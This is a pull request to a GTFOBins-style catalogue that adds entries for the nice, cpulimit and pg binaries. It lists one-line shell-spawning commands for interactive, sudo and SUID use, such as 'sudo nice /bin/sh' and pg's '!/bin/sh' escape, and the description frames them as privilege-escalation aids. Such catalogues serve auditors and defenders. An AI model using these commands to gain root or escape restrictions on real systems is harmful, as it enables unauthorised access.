### PR TITLE
Nice, cpulimit and pg

### DIFF
--- a/_gtfobins/cpulimit.md
+++ b/_gtfobins/cpulimit.md
@@ -1,0 +1,9 @@
+---
+functions:
+  execute-interactive:
+    - description: With -f, the commands are executed in the terminal you start them. -l 100 specified that the command is to use a single CPU core
+    - code: cpulimit -l 100 -f /bin/sh
+  execute-non-interactive:
+    - description: With -b, which is the default, commands are executed in the background
+      code: cpulimit -l 100 whoami
+---

--- a/_gtfobins/cpulimit.md
+++ b/_gtfobins/cpulimit.md
@@ -1,11 +1,10 @@
 ---
 functions:
   execute-interactive:
-    - description: With -f, the commands are executed in the terminal you start them. -l 100 specified that the command is to use a single CPU core
     - code: cpulimit -l 100 -f /bin/sh
   execute-non-interactive:
-    - description: With -b, which is the default, commands are executed in the background
+    - description: By default, commands are executed in the background
       code: cpulimit -l 100 whoami
   sudo-enabled:
-    - sudo cpulimit -l 100 -f /bin/sh
+    - code: sudo cpulimit -l 100 -f /bin/sh
 ---

--- a/_gtfobins/cpulimit.md
+++ b/_gtfobins/cpulimit.md
@@ -6,4 +6,6 @@ functions:
   execute-non-interactive:
     - description: With -b, which is the default, commands are executed in the background
       code: cpulimit -l 100 whoami
+  sudo-enabled:
+    - sudo cpulimit -l 100 -f /bin/sh
 ---

--- a/_gtfobins/cpulimit.md
+++ b/_gtfobins/cpulimit.md
@@ -2,9 +2,6 @@
 functions:
   execute-interactive:
     - code: cpulimit -l 100 -f /bin/sh
-  execute-non-interactive:
-    - description: By default, commands are executed in the background
-      code: cpulimit -l 100 whoami
   sudo-enabled:
     - code: sudo cpulimit -l 100 -f /bin/sh
 ---

--- a/_gtfobins/nice.md
+++ b/_gtfobins/nice.md
@@ -1,0 +1,9 @@
+---
+functions:
+  execute-interactive:
+    - code: nice /bin/sh
+  suid-enabled:
+    - code: ./nice /bin/sh -p
+  sudo-enabled:
+    - code: sudo nice /bin/sh
+---

--- a/_gtfobins/pg.md
+++ b/_gtfobins/pg.md
@@ -1,0 +1,17 @@
+---
+functions:
+  execute-interactive:
+    - code: |
+        pg /etc/profile
+        !/bin/sh
+  file-read:
+    - code: pg file_to_read
+  sudo-enabled:
+    - code: |
+        sudo pg /etc/profile
+        !/bin/sh
+  suid-limited:
+    - code: |
+        ./pg /etc/profile
+        !/bin/sh
+---


### PR DESCRIPTION
I've ran across three more binaries that can help you escalate privileges:
* `Nice` - works just like ionice except the programs execution depends on CPU activity and not disk activity. The file is basically a direct copy, as the execution methods are nearly identical. Present by default on many OSs, hence quite important
* `cpulimit` - a niche tool, usually not present by default, allowing you to set a maximum cpu usage for a running program(100% = 1 core), or start a new one with the restriction
* `pg` - yet another pager allowing command execution with `!`. Can be invoked with `-r` to prevent this